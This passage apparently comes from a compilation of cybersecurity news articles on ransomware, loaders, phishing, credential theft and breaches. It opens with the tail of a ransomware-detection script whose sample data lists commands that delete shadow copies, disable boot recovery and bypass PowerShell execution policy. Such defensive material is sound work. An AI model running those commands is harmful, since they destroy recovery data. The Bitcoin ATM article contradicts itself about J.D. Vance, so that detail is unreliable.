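2024-10-12 03:40:02|SRV-FS01|corp\jdoe|C:\Windows\System32\vssadmin.exe|vssadmin.exe delete shadows /all /quiet
2024-10-12 03:40:03|SRV-FS01|corp\jdoe|C:\Windows\System32\bcdedit.exe|bcdedit.exe /set {default} recoveryenabled No
2024-10-12 03:40:10|SRV-FS01|corp\jdoe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -ExecutionPolicy Bypass -File \\SRV-FS01\share$\run.ps1
2024-10-12 09:00:00|WS-042|corp\alice|C:\Program Files\WinRAR\WinRAR.exe|WinRAR.exe x report.rar""".splitlines()

if __name__ == "__main__":
    for rule, host, detail in detect_safepay_ttps(SAMPLE_EVENTS):
        print(f"{rule:28s} {host:10s} {detail}")
```

The archive-then-transfer rule is the one that fires hours before encryption, which is the window in which response still prevents the data loss; the workstation's lone WinRAR extraction shows why the rule requires the transfer tool as the second step rather than alerting on the archiver alone.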

Although relatively new, SafePay’s connection to LockBit and its sophisticated techniques present significant risks across industries. As Huntress analysts concluded: “The threat actor was able to use valid credentials to access customer endpoints and was not observed enabling RDP, creating new user accounts, or establishing persistence.”

New Malware ‘Pronsis Loader’ Uses Rare JPHP Language to Evade Detection and Deliver High-Risk Payloads

 

Trustwave SpiderLabs recently announced the discovery of a new form of malware named Pronsis Loader. This malware has already started to pose significant challenges for cybersecurity experts due to its unique design and operation. Pronsis Loader leverages JPHP, a lesser-known programming language, and incorporates sophisticated installation tactics, which complicates detection and mitigation efforts by standard security tools.

JPHP is an implementation of PHP that compiles to Java bytecode and runs on the JVM, and it is rarely seen in malware development, especially for desktop applications. While PHP is commonly used for web applications, packaging a loader as JPHP-compiled Java gives cybercriminals an edge: tooling tuned to the usual malware toolchains is less likely to recognize it.

Pronsis Loader’s use of JPHP helps it slip past detection systems whose signatures and heuristics are built around malware written in common languages and toolchains; the unusual runtime adds a layer of “stealth” that lets the malware pass many security tools. In addition, Pronsis Loader uses obfuscation and encryption to hide during initial infection, installing itself silently while imitating legitimate processes, which hinders both automated and manual detection.

Once Pronsis Loader is installed, it can download and execute other types of malware, such as ransomware, spyware, and data-theft tools. This modular approach makes it highly adaptable, allowing cybercriminals to customize payloads based on their target’s specific system or environment. As part of a broader trend in cybercrime, loaders like Pronsis are used in multi-stage attacks to introduce further malicious programs, providing attackers with a flexible foundation for varied threats.

To counter this evolving threat, security teams should consider adopting advanced behavioral monitoring and analysis techniques that identify malware based on its behavior, rather than relying solely on signature detection. Additionally, staying updated on threat intelligence helps to recognize rare languages and methods, such as those employed by Pronsis Loader.

Shawn Kanady, Global Director at Trustwave SpiderLabs, emphasized the significance of Pronsis Loader’s stealth and adaptability, noting its potential to deliver high-risk payloads like Lumma Stealer and Latrodectus. Kanady concluded that understanding Pronsis Loader’s unique design and infrastructure offers valuable insights for strengthening cybersecurity defenses against future campaigns.







Cybersecurity Beyond Phishing: Six Underrated Threats


Cybercriminals are continually developing new methods to exploit vulnerabilities, and even the most tech-savvy individuals and organizations can find themselves at risk. While some cyberattacks like phishing and malware are well-known, several lesser-known but equally dangerous threats require attention. This blog post explores six types of cyberattacks you might not have considered but should be on your radar.

1. Botnet Attacks

A botnet attack involves a network of compromised computers, or "bots," which are controlled by a single entity, often referred to as a "botmaster." These botnets can be used to launch large-scale cyberattacks such as Distributed Denial-of-Service (DDoS) attacks, which overwhelm a target’s resources, rendering it inaccessible. 

In 2016, hackers used the Mirai botnet to take control of millions of devices and launched a huge DDoS attack on Dyn, a major Domain Name System (DNS) service provider.

Some hackers also take over IoT devices to "brick" them, that is, corrupt the device’s firmware so it becomes useless. They do this for fun or to make a point about cybersecurity.

2. LLMjacking

As language models become integral in various applications, they present new cyberattack vectors. LLMjacking, or Large Language Model hijacking, involves manipulating language models to generate harmful or misleading information. 

Attackers can exploit vulnerabilities in these models to spread misinformation, influence public opinion, or even automate phishing attacks. The rise of AI-powered tools necessitates the implementation of stringent security measures to safeguard against such manipulations.

Companies that utilize cloud-hosted Large Language Models (LLMs) are at risk of LLMjacking because they possess the server resources needed to operate generative AI programs. Hackers might exploit these resources for personal purposes, such as creating their own images, or for more malicious activities like generating harmful code, contaminating the models, or stealing sensitive information.

While an individual hijacking a cloud-based LLM for personal use might not cause significant damage, the costs associated with resource usage can be substantial. A severe attack could result in charges ranging from $50,000 to $100,000 per day for the owner.

3. Ransomware

Unlike traditional malware that aims to steal information, ransomware directly extorts victims. Attackers encrypt valuable data and demand payment, often in cryptocurrency, for the decryption key. Organizations of all sizes are potential targets, and the financial and reputational damage can be severe. Preventative measures, including regular data backups and cybersecurity training, are crucial in mitigating the risks of ransomware attacks.

4. Insider Threats

An insider threat comes from within the organization, typically from employees, contractors, or business partners who have inside information concerning the organization’s security practices. These threats can be malicious or unintentional but are dangerous due to the privileged access insiders have. 

They may misuse their access to steal sensitive information, disrupt operations, or introduce vulnerabilities. Organizations need to implement strict access controls, regular monitoring, and education to reduce the risk of insider threats.

5. Man-in-the-Middle (MitM) Attacks

Man-in-the-middle attacks occur when an attacker intercepts communication between two parties without their knowledge. The attacker can then eavesdrop, manipulate, or steal sensitive information being exchanged. 

MitM attacks are particularly concerning for financial transactions and other confidential communications. Encrypted communication channels, strong authentication methods, and educating users about potential risks are effective strategies to prevent such attacks.

6. Phishing Schemes

Phishing remains one of the most prevalent cyber threats, evolving in sophistication and technique. Attackers use deceptive emails, messages, or websites to trick individuals into divulging personal information such as usernames, passwords, and credit card details. 

Spear phishing, a targeted form of phishing, involves personalized attacks on specific individuals or organizations, making them harder to detect. Continuous cybersecurity awareness training and employing advanced email filtering solutions can help protect against phishing schemes.

The Evolution of Phishing Emails: From Simple Scams to Sophisticated Cyber Threats

Phishing emails have undergone significant changes over the past few decades. Once simple and easy to detect, these scams have now evolved into a sophisticated cyber threat, targeting even the most tech-savvy individuals and organizations. Understanding the development of phishing attacks is key to protecting yourself from these ever-evolving cyber dangers.

In the late 1990s and early 2000s, phishing emails were quite basic and easily identifiable. One of the most well-known scams was the "Nigerian Prince" email. These messages claimed to be from foreign royalty or officials, offering large sums of money in return for a small processing fee. The common signs included poor language, unrealistic promises, and large financial rewards—elements that eventually made these scams easy for users to recognize and dismiss.

As people became aware of these early scams, phishing attacks shifted focus, aiming to steal sensitive financial information. By the mid-2000s, attackers began impersonating banks and financial institutions in their emails. These messages often used fear-inducing language, such as warnings of account breaches, to pressure recipients into handing over personal details like login credentials and credit card information. During this time, phishing attempts were still marked by clear warning signs: poorly written emails, generic greetings, and inaccurate logos. However, as technology advanced, so did the attackers' ability to produce more convincing content.

The evolution of phishing took a major step forward with the introduction of spear phishing. Unlike traditional phishing, which targets a broad audience, spear phishing focuses on specific individuals or companies. Attackers gather personal information through social media and public records to craft emails that appear highly legitimate, often addressing the victim by name and referencing workplace details. This tailored approach makes the scam more believable and increases the chances of success.

Phishing emails today have become highly sophisticated, utilizing advanced techniques such as email spoofing to mimic trusted sources. Attackers frequently impersonate colleagues, supervisors, or official entities, making it difficult for users to tell the difference between genuine and malicious messages. Modern phishing schemes often rely on psychological tactics, using fear or urgency to pressure recipients into clicking harmful links or downloading malware. This evolution reflects the growing complexity of cybercriminal activities, demanding greater awareness and stronger cybersecurity defenses.

In summary, phishing emails have evolved from basic scams to intricate, personalized attacks that are harder to detect. Being informed about these tactics and staying vigilant is critical in the digital age. If you're ever in doubt about an email’s legitimacy, contact your Information Security Team for verification.

How Ignoring These Wi-Fi Settings Can Leave You Vulnerable to Hackers

In today's plugged-in world, most of us rely on the Internet for nearly everything, from shopping and banking to communicating with family. While that reliance lets us do almost anything remotely, it also raises the chance that cyber thieves will probe your home Wi-Fi network for a weak point to pry into. Securing your home network is therefore critical to your privacy.

The Importance of Router Settings

But for privacy lawyer Alysa Hutnik, the most common mistake isn't what people do but what they don't: namely, change the default settings on their Wi-Fi routers. Every router's default settings are public knowledge, and that's how hackers get in. "You wouldn't leave your front door open," she points out; leaving these default settings in place is little different from that.

The very first thing in securing your Wi-Fi network is changing the default password to something strong and unique. This would reduce the chances of unauthorised access significantly. You may also want to take a look at all the other configurations you can make on your router to optimise security features.

Encryption: Protecting Your Data

Another step in securing your home network is enabling encryption. Most current routers offer an encryption option such as WPA (Wi-Fi Protected Access). It scrambles data while it travels over your network, so an eavesdropper who captures the traffic cannot simply read it. Leaving encryption disabled is much like leaving personal information lying around in the open for anyone to grab. Checking your settings and enabling WPA encryption adds a much-needed layer of defence.

Check Security Settings on All Devices

Securing your home network doesn't stop at the router. Any device that connects to your Wi-Fi should have its privacy and security settings properly enabled as well. Hutnik says that whenever you bring home a new device, whether a phone, smart speaker, or laptop, take a few minutes to read through its privacy and security options. Many devices ship with configurations that are not optimised for security by default; usually those settings can be adjusted in a minute or two.

Quick Easy-to-Follow Steps to Mitigate Risk

Beyond configuring your network and devices, Hutnik urges you to take a few extra precautions with your privacy. One is putting tape over your webcam when you are not using it. There is always the prospect of hackers taking control of your camera through malware and spying on you, and something as simple as a sticker or a Post-it note over the lens removes that worry.

Sure enough, these measures won't protect you from cyber-attacks right and left, but they certainly reduce the risk. The more of our lives we put online, the more important it becomes that we take time to harden our home networks and equipment.

Stay Vigilant and Stay Protected

Understanding home network vulnerabilities and acting on them, by securing your router, using encryption, and checking your devices' settings, will go a long way towards protecting you from hackers and other online threats. Little habits like covering your webcam add up to making you safer on the internet.

Take small steps in securing your home network to avoid many future headaches and ensure that your personal info does not end up in cyber-criminals' pockets.

Bitcoin ATM Emerges as Major Threat to Cryptocurrency

There is an ominous growth in Bitcoin ATMs across the United States, and some experts have claimed they are also one of the biggest cybercrime threats to the country. Bitcoin ATMs share a few characteristics with their cash counterparts: there are PINs to punch, and there are withdrawal fees as well.

However, unlike cash ATMs, crypto ATMs have a high value, making them prime targets for hackers who are looking for ways to steal data. The problem is that whereas the location of a cash ATM at a gas station may not draw much attention, the location of a Bitcoin ATM gets more scrutiny from fraudulent individuals. The UK's National Crime Agency has reported in an article published by CNBC on September 8 that Bitcoin ATMs have proven to be one of the most popular ways for individuals to buy and sell cryptocurrencies, although they have additionally evolved into a prime target for hackers and scammers. 

There is no difference in the operation of these machines from traditional ATMs; however, thanks to the significant value of cryptocurrencies, they can be very attractive to cybercriminals, who will exploit both physical and digital vulnerabilities to their advantage. According to Timothy Bates, an assistant professor of cybersecurity at the University of Michigan, these machines are especially vulnerable to hacking due to the lack of security measures that are often part of the software used in these devices. 

According to Bates, Bitcoin ATMs can be infected with malware that allows hackers to steal private keys and manipulate transactions. An ATM can also be compromised through weaknesses in network security, which may allow criminals to intercept communications between the ATM and its server and steal data.

This is especially concerning for ATMs that do not receive regular updates or security patches. Weak network security is a second point of failure: if an ATM's communications with its server are not adequately protected, attackers can intercept them, gaining access to the data in transit or even to the server itself, Bates explained.

Bitcoin ATMs need to be taken seriously because of the threat posed by both hackers and scammers. Since 2020, according to a report released by the Federal Trade Commission this week, the number of scamming incidents has increased by 1,000%. In a curious twist, the risks associated with Bitcoin ATMs are directly proportional to their strengths, according to Joe Dobson, the principal analyst at Mandiant, which is owned by Google Cloud and a company that specializes in cybersecurity. 

Bitcoin has three main characteristics: decentralization, permissionlessness, and immutability. There is no way to reverse a transaction if funds are deposited to the wrong address, according to Dobson. Although many crypto bulls are attracted to Bitcoin because of its decentralization and lack of governance, that is a problem when it is used in ATMs. "There are no regulations in the Bitcoin community that dictate who can run a Bitcoin ATM and who cannot, so independent organizations operate Bitcoin ATMs without any interference from the Bitcoin community," said Dobson.

In addition to this, some old criminal tricks might be reversible in a traditional banking system, but not so in the Bitcoin world, which comes with its own set of unique challenges. It is possible for someone, for instance, to maliciously place their deposit slips into the bank stack, which can lead to folks being tricked into depositing money into their accounts unknowingly. According to Dobson, "there is the possibility that Bitcoin ATMs could also be subject to a similar attack." 

According to Dobson, "If an attacker compromises an ATM, they will be able to change the recipient wallet address (or "account number"), which in turn will steal the money of the user." Bitcoin ATMs, then, carry over old tricks, and they also introduce newer threats that cash ATMs do not face. Several Bitcoin ATMs require users to provide personally identifiable information, such as their ID number or even their Social Security number, to satisfy the "Know Your Customer (KYC)" requirements that apply in the financial industry.

Depending on the level of security that exists on a Bitcoin ATM, this information could be at risk. The Middletown Food Mart, located on the fringes of the town, in a hollowed-out section of the town near the town's main road, has a Bitcoin Depot ATM running alongside a regular cash machine, which blends in with the potato chips, bottled water, and beer on sale. 

Those who live in Middletown know it is the hometown of Donald Trump's running mate, Ohio Senator J.D. Vance, who, like Trump, has refashioned himself as a crypto-advocate and has been speaking out against the adoption of Bitcoin. Vance grew up just a few blocks from the Middletown Food Mart. Among the best ways to avoid these scams is to be cautious and sceptical about any request to make a payment through a Bitcoin ATM. Legitimate businesses rarely, if ever, request payment for their services in Bitcoin via a machine.

"During a transaction, users must verify the validity of the transaction, particularly checking the recipient's wallet for references to questionable entities," Frei said, adding that an additional precaution can be taken by using licensed ATMs from reliable operators.

Users will be able to follow certain steps to make sure they are dealing with a Bitcoin ATM or party that is legitimate and owned by someone reputable. Adding to Frei's warning, he stressed the importance of being cautious and not sending bitcoins to unknown wallets. A platform like Chainabuse can help validate the legitimacy of the transaction by examining the risk score of the recipient's wallet, which can help verify their legitimacy. 

In the U.S., Bitcoin Depot operates over 8,000 ATMs, making it the country's largest operator of Bitcoin ATMs. Its chief executive, Brandon Mintz, assured CNBC that the company's software and hardware are designed to deter hackers, although he cautioned consumers not to fall victim to scams or be deceived by them. There seem to be just 10 operators worldwide who manage about 74% of ATMs in the world, as per Frei's analysis of data.

Security Budgets Rise Slowly, But Hiring Slows Down, Research Shows

According to the report by IANS Research and Artico Search, there is indeed a fair probability that expanded security budgets will continue to rise in 2024, albeit at a slower pace compared to the last couple of years. For this year, security spending has been jacked up some 8%, one notch higher than the 6% increase in 2023. That's still miles away from the increases of 16% and 17% seen in 2021 and 2022, respectively.

Meanwhile, the security budget grew rather insignificantly, and the share of security spending in an IT portfolio has grown from 8.6% in 2020 to 13.2% in 2024. This means that cybersecurity is finding its place as one of the critical components of an IT setup—at least for organisations which depend most on digital technologies today.

Security teams must become the protective force of organisations but are perennially challenged not to be subjugated by competing priorities and small budgets. "Security is getting pulled closer to the core of the business," said IANS Senior Research Director Nick Kakolowski. "While the level of protection desired by companies goes up, the tools and skills given to security teams fall short of what would satisfy their growing expectations."

Reduction in the Recruitment of Security Personnel

One of the most striking trends underscored in this report is the remarkable shrinkage in hiring that is taking place in the cybersecurity sector. Security teams were 12% higher in 2024 than a year earlier, but that growth was slower compared to the 31% jump in 2022 and a 16% increase in 2023. This takes place at a time of general economic uncertainty, with businesses placing greater control on the management of their overall costs.

While security remains a top priority for most organisations, economic pressure has held businesses back from increasing teams at the same rate. With shrinking budgets, most security teams have no alternative but to do more with less, further compounding the task of keeping pace with an unprecedented surge in threats. 

The Future of Cybersecurity Spending

Analysts note that, with business strategies hinging on cybersecurity, security budgets will remain on an upward trend, albeit at a slower and more incremental pace. The reasoning is that business success increasingly calls for comprehensive security, given growing dependence on digital technologies across all functions. Gartner estimates that security investments will reach $212 billion by 2025, 15% above its forecast for 2024. That projection reinforces the belief that cybersecurity will remain one of the most critical investments for companies.

Overall, security budgets continue to rise, and cybersecurity now claims a larger share of IT spending, but the slow hiring rate points to the difficulty organisations face in growing their security teams as fast as they would like. As with any other major business function, organisations need to pay strategic attention not only to investment in security but also to the management and sustainability of their security posture, especially in periods of economic difficulty.

Fota Wildlife Park Issues Urgent Warning After Website Cyberattack

Fota Wildlife Park in East Cork has issued an urgent warning following a major cyberattack on its website, potentially compromising thousands of customers' personal and financial details. The park advises those who made transactions on its website between May 12 and August 27, 2024, to cancel their debit or credit cards as a precaution. 

The cyberattack was discovered on August 27, prompting Fota Wildlife Park to swiftly engage external forensic cybersecurity experts to investigate the breach. The park has also reported the incident to the Data Protection Commission (DPC) and An Garda Síochána, Ireland’s national police service, as part of its response. Initial investigations revealed that the attackers may have accessed the usernames, passwords, and email addresses of users with accounts on the website. 

There are also concerns that full credit card details may have been compromised, leading to the strong recommendation for customers to cancel their cards and closely monitor their bank statements for any unusual activity. Paul C. Dwyer, President of the International Cyber Threat Task Force, indicated that the attack may have involved a "man-in-the-middle" strategy, where criminals intercepted data as it was entered on the website. This could have enabled them to collect complete credit card details, which might be sold on the dark web. 

The park has taken its website offline to prevent further damage while working to secure its systems. Despite the breach, Fota Wildlife Park remains open to visitors, with tickets available for purchase at the entrance. In a statement, Fota Wildlife Park assured customers that it is treating the situation with the utmost seriousness and has made protecting their personal and financial information a top priority. 

The park is in the process of contacting all customers who may have been affected. Meanwhile, Fota Island Resort, a nearby hotel and golf destination, clarified that it is a completely separate business from Fota Wildlife Park and was not impacted by the cyberattack. The DPC has confirmed that an investigation is underway amid concerns that the breach could lead to targeted phishing attacks and other cyber threats.

Chinese Hackers Exploit Serious Flaw in Versa SD-WAN Systems

A Chinese cyber-espionage group, known as Volt Typhoon, has been exploiting a newly discovered security flaw in Versa Networks' SD-WAN Director servers. This zero-day vulnerability, identified as CVE-2024-39717, has already been used to infiltrate several organizations. Given the seriousness of this issue, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has listed it among known exploited vulnerabilities, urging immediate corrective actions.

The CVE-2024-39717 vulnerability impacts all versions of Versa Director released before version 22.1.4. The issue originates from a feature in the system's graphical user interface (GUI) that allows for customisation. Versa Director is a crucial part of Versa Networks' software-defined wide area networking (SD-WAN) solutions, which are used by ISPs, MSPs, and large corporations to manage network devices, route traffic, and enforce security policies. Unfortunately, this vulnerability enables attackers to steal user credentials, potentially leading to further attacks.

Dan Maier, Versa's Chief Marketing Officer, noted that this flaw could allow attackers to escalate privileges without authorization. Attackers can initially access Versa Director through high-availability management ports 4566 and 4570, particularly if these ports are left open to the internet. Once inside, they can gain administrator-level credentials, giving them complete control over the system. Maier emphasised that Versa has long advised customers to limit access to these critical ports to prevent such security breaches.

The vulnerability was first discovered by researchers at Lumen Technologies' Black Lotus Labs. They found that Volt Typhoon had been exploiting this flaw since at least June 2024. The attackers used small office/home office (SOHO) devices, a common tactic for this group, to infiltrate vulnerable Versa Director systems via the exposed management ports. After gaining access, the attackers deployed a custom web shell named "VersaMem" to capture plaintext user credentials and monitor the Apache Tomcat web server's incoming traffic.

On June 21, Lumen researchers informed Versa about the vulnerability, shortly after they believed Volt Typhoon started exploiting it. Versa responded by issuing advisories on July 26 and August 8, outlining steps to reduce the risk. By August 26, they had published a detailed security bulletin describing the flaw and providing guidance for customers to protect their systems.

At least five organisations, including four based in the United States, have been compromised due to this vulnerability. These organisations are primarily from the managed service provider, internet service provider, and IT sectors. Given the seriousness of the situation, CISA has mandated that federal agencies apply the necessary mitigations by September 13 or cease using the vulnerable technology until it is secured.

Although the vulnerability was rated as moderately severe with a CVSS score of 6.6 out of 10, Versa has highlighted the significant risks associated with it. While the vulnerability is complex to exploit and requires high-level privileges, it becomes much easier to exploit if the management ports are exposed. In such cases, attackers can upload unauthorized files and execute code via the VersaMem web shell, leading to severe security breaches.

Versa has strongly advised its customers to update their systems to the latest versions, which include security enhancements that make the software more resistant to attacks. They have also recommended following their system hardening and firewall guidelines to reduce the likelihood of exploitation.

The Volt Typhoon group’s exploitation of the CVE-2024-39717 vulnerability highlights the ongoing threat posed by state-backed cyber actors. Although Versa has patched the vulnerability, organizations using Versa Director must act quickly to secure their systems and prevent further breaches. This incident serves as a reminder of the importance of keeping software updated and securing all network entry points to defend against sophisticated cyber threats.

Ransomware and Extortionware: The Two Cybersecurity Dangers

In the rapidly changing landscape of cybersecurity dangers, two threats come up often: ransomware and extortionware. While the two share some similarities, understanding their differences is important for effective defense tactics.

What is Ransomware?

Ransomware is a type of malware that encrypts a victim’s data, rendering it inaccessible until a ransom is paid. The attackers typically demand payment in cryptocurrency to maintain anonymity. The primary goal of ransomware is to disrupt access to critical data and systems, forcing victims to pay for decryption keys.

The core mechanism of ransomware is data encryption. Once infected, the victim’s files are locked using strong encryption algorithms. Attackers demand a ransom, often accompanied by a deadline, to provide the decryption key. Payments are usually requested in cryptocurrencies like Bitcoin to ensure the attackers’ anonymity. Ransomware can affect individuals, businesses, and even critical infrastructure, causing significant financial and operational damage.

The Rise of Extortionware

Extortionware, on the other hand, encompasses a broader range of tactics beyond mere encryption. It involves stealing sensitive data and threatening to release it unless a ransom is paid. This category includes ransomware but also extends to other forms of cyber extortion such as sextortion, doxing, and Distributed Denial of Service (DDoS) attacks.

Unlike ransomware, extortionware often involves stealing sensitive data before making ransom demands. The primary leverage is the threat of exposing stolen data, which can include personal information, financial records, or confidential business data. Extortionware can employ various methods, including phishing, social engineering, and exploiting vulnerabilities to gain access to data. The threat of public exposure adds a psychological dimension to the attack, increasing the likelihood of victims paying the ransom.

Comparing Ransomware and Extortionware

While both ransomware and extortionware aim to extort money from victims, their methods and impacts differ significantly. Ransomware relies primarily on encryption to lock data, whereas extortionware involves data theft and the threat of exposure. Ransomware leverages the inability to access critical data, while extortionware leverages the fear of sensitive data being exposed publicly. 

Ransomware can disrupt operations by making data inaccessible, whereas extortionware can cause reputational damage and legal consequences if sensitive data is leaked. Ransomware creates urgency through deadlines for payment, while extortionware adds psychological pressure by threatening public exposure.

Rising Threat of Stolen Credentials and Initial Access Breaches

Weak or reused passwords continue to pose significant risks for organizations, as criminals increasingly exploit stolen credentials to access user accounts. This trend has fueled a thriving market for stolen credentials and the initial access they provide. The ENISA Threat Landscape 2023 report highlights a year-over-year growth in the Initial Access Broker (IAB) market, with credentials being the primary commodity for sale.

Stealer malware frequently infiltrates victim machines through social engineering tactics, primarily phishing, and sometimes through paid distribution schemes using the Emotet and Qakbot botnets. Other campaigns entice users to download seemingly legitimate software via malvertising.

ENISA anticipates that future social engineering campaigns will adapt to new defensive measures aimed at protecting credentials from abuse.

Increasing Challenges with Stolen Credentials
Organizations face growing challenges with stolen credentials. The Verizon 2024 Data Breach Investigation Report (DBIR) reveals a 180% increase in attacks exploiting vulnerabilities to initiate breaches compared to the previous year. Stolen credentials were the leading initial action in breaches, accounting for 24%, just ahead of ransomware at 23%.

Fraudsters employ various methods to steal credentials, including malware that steals passwords and sells them on the dark web. Popular tools for this purpose include Redline, Vidar, and Raccoon Stealer. The FBI has warned of cybercriminals using search engine advertisements to impersonate brands and direct users to malicious sites that host ransomware to steal login credentials.

Credentials can also be compromised through brute force attacks, where cybercriminals use tools to test password combinations until the correct one is found. These methods range from simple trial and error to more sophisticated dictionary attacks, exploiting common password choices.

Potential for Major Breaches
The SolarWinds attack, described by Microsoft President Brad Smith as "the largest and most sophisticated attack the world has ever seen," is often cited as an example of the danger of weak credentials. In 2019 a security researcher found SolarWinds credentials exposed in a public GitHub repository; an intern had set the password "solarwinds123" on an account with access to a company update server. SolarWinds has said that this password was unrelated to the Orion supply-chain compromise itself, but the incident still shows how a single weak credential can expose critical infrastructure.

Another notable example is the 2012 Dropbox breach, which exposed the credentials of more than 60 million users. A Dropbox employee had reused a password that was exposed in the LinkedIn breach of the same year, where millions of password hashes were taken, and attackers used it to access Dropbox's internal systems.

ENISA notes that while abusing valid accounts for initial access is not a new technique, it remains effective. Misconfigured accounts and accounts with weak passwords are particularly exposed. Multi-factor authentication (MFA) stops many of these attacks, but it is not foolproof: attackers intercept one-time codes with adversary-in-the-middle phishing kits, and they bombard users with push notifications until one is approved out of fatigue (MFA fatigue, or push bombing).

ENISA expects credentials to remain a focal point for cybercrime actors despite technical protective measures, as these actors continually find ways around them.

Security teams recognize the danger of stolen credentials and the need for strong controls, but complacency is not an option: the techniques used to obtain and abuse credentials keep evolving, and defenses must keep pace.

Organizations must enforce the creation of strong passwords resistant to brute force attacks and other forms of exploitation. Specops Password Policy can help build robust password policies by:

  • Generating personalized dictionary lists to prevent the use of commonly used words within the company.
  • Providing immediate and interactive updates to users when changing passwords.
  • Restricting the use of usernames, display names, certain words, consecutive characters, incremental passwords, and repeating parts of previous passwords.
  • Applying these features to any GPO level, computer, individual user, or group within the organization.
  • Continuously checking passwords against a list of over 4 billion known compromised passwords, with newly breached passwords added daily.
Increasing overall password security, enforcing good password hygiene, and eliminating weak passwords enhance the security of Active Directory environments and privileged accounts. Organizations must prepare their defenses by scanning for password vulnerabilities in Active Directory to detect weak and compromised passwords.
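As an added illustration of the kinds of checks listed above, implemented in plain Python rather than taken from Specops (or any other product, or the Active Directory password filter API), here is a policy filter that rejects passwords containing identity or company words, repeated or sequential characters, incremental or partial reuse of the previous password, and matches against a breached-password list. The company dictionary, the breached list and the sample accounts are constructed stand-ins for real data.

```python
"""Password policy filter mirroring the checks listed above.

Added example in plain Python; this is not Specops code and not Active
Directory's password filter API. The company dictionary and the breached
list are constructed stand-ins for real data.
"""
import hashlib
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Undo common leet substitutions so 'R0ck3t' still matches 'rocket'.
LEET_NORMALISE = str.maketrans({"@": "a", "3": "e", "1": "i", "0": "o", "$": "s", "5": "s"})


def sha1_upper(password: str) -> str:
    """Uppercase hex SHA-1, the form breached-password feeds (e.g. HIBP) use."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


# Constructed stand-in for a breached-password feed of SHA-1 digests.
BREACHED_SHA1: Set[str] = {sha1_upper(p) for p in ["password", "123456", "Welcome1", "qwerty"]}


@dataclass
class Policy:
    min_length: int = 12
    company_words: Set[str] = field(default_factory=lambda: {"acme", "widget", "rocket"})
    max_repeat: int = 2        # 'aa' allowed, 'aaa' rejected
    max_sequence: int = 3      # 'abc'/'123' allowed, 'abcd'/'1234' rejected
    reuse_fragment: int = 4    # any 4-char run shared with the old password


def normalise(s: str) -> str:
    return s.lower().translate(LEET_NORMALISE)


def has_repeat(pw: str, n: int) -> bool:
    """More than n identical characters in a row."""
    return re.search(r"(.)\1{%d,}" % n, pw) is not None


def has_sequence(pw: str, n: int) -> bool:
    """More than n consecutive code points ascending or descending (abcd, 4321)."""
    s = pw.lower()
    for i in range(len(s) - n):
        codes = [ord(c) for c in s[i:i + n + 1]]
        steps = {b - a for a, b in zip(codes, codes[1:])}
        if steps == {1} or steps == {-1}:
            return True
    return False


def is_increment(old: str, new: str) -> bool:
    """Summer2023! -> Summer2024! style changes."""
    pattern = r"(.*?)(\d+)(\W*)"
    m_old, m_new = re.fullmatch(pattern, old), re.fullmatch(pattern, new)
    if not (m_old and m_new):
        return False
    return (m_old.group(1).lower() == m_new.group(1).lower()
            and int(m_new.group(2)) == int(m_old.group(2)) + 1)


def shares_fragment(old: str, new: str, n: int) -> bool:
    """Any n-character run of the old password (leet-normalised) reappears."""
    o, w = normalise(old), normalise(new)
    return any(o[i:i + n] in w for i in range(len(o) - n + 1))


def check_password(pw: str, username: str, display_name: str,
                   old_password: Optional[str] = None,
                   policy: Optional[Policy] = None) -> List[str]:
    """Return the list of policy violations; an empty list means accepted."""
    policy = policy or Policy()
    norm = normalise(pw)
    violations = []
    if len(pw) < policy.min_length:
        violations.append("too short")
    for token in [username] + display_name.split():
        if len(token) >= 3 and normalise(token) in norm:
            violations.append(f"contains identity token '{token}'")
    for word in sorted(policy.company_words):
        if word in norm:
            violations.append(f"contains company word '{word}'")
    if has_repeat(pw, policy.max_repeat):
        violations.append("repeated characters")
    if has_sequence(pw, policy.max_sequence):
        violations.append("sequential characters")
    if old_password is not None:
        if is_increment(old_password, pw):
            violations.append("incremental change of previous password")
        elif shares_fragment(old_password, pw, policy.reuse_fragment):
            violations.append("reuses part of previous password")
    if sha1_upper(pw) in BREACHED_SHA1:
        violations.append("found in breached-password list")
    return violations


if __name__ == "__main__":
    # Constructed sample user: username 'asmith', display name 'Alice Smith',
    # previous password 'Summer2023!'.
    for candidate in ["Welcome1", "Summer2024!", "Smith#R0cket2024", "Tangerine!Velvet-Harbor77"]:
        result = check_password(candidate, "asmith", "Alice Smith", old_password="Summer2023!")
        print(candidate, "->", result or "OK")
```

Returning every violation rather than stopping at the first is what makes the immediate, interactive feedback mentioned above possible. Two design points matter in practice: the comparison against the previous password needs the old plaintext (or a reversible store of it), which is only available at change time inside a password filter and should never be retained afterwards, and the breached list is hashed so the check can be done with the k-anonymity range query that feeds such as Have I Been Pwned offer instead of shipping the full list.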

Louvre and Top French Museums Fall Victim to Ransomware Attack, Including Olympic Sites

Over 40 museums in France, including the Grand Palais, a key venue for the upcoming Paris Olympics, and the world-famous Louvre, were recently reported to have fallen victim to a ransomware attack. The breach, which occurred over the weekend of August 3rd, has raised concerns about the security of cultural institutions in the country.

According to police sources, the cyberattack specifically targeted a system that centralises financial data for various museums. This attack disrupted operations and led to the hackers demanding a ransom. They threatened to release sensitive financial information unless their demands were met. Although the exact amount of the ransom has not been disclosed, the incident has sparked a criminal investigation focusing on data system breaches and extortion by an organised gang.

The national cybersecurity agency of France, ANSSI, confirmed that it had been notified of the breach and was actively investigating the situation. Importantly, the agency clarified that the compromised systems are not involved in any Olympic-related events, alleviating some concerns about the security of the upcoming games. The Grand Palais, which is scheduled to host fencing and martial arts during the Olympics, acknowledged that it had been affected by the attack but declined to share further details about the extent of the damage or the ongoing investigation.

Interestingly, the Louvre, initially named as a potential target by the police, has since denied being impacted by the cyberattack. This denial has added a layer of confusion, as conflicting reports about the scope of the attack have emerged. Whatever the final tally, the ransomware attack has affected a large part of the museum sector in France, underlining that even the most renowned cultural institutions are exposed to cyber threats.

Ransomware attacks have become increasingly common in recent years: criminals infiltrate computer systems, encrypt data, and demand payment in exchange for unlocking the compromised systems, and increasingly also threaten to publish stolen data, as happened here. This incident highlights the expanding threat of cybercrime, even against prestigious and heavily protected targets like the Grand Palais and other prominent French museums.

As the investigation continues, French authorities are working to identify the perpetrators and prevent future attacks on the nation's cultural heritage. This incident calls for proper implementation of robust cybersecurity measures, especially as the world prepares for major international events like the Paris Olympics. 

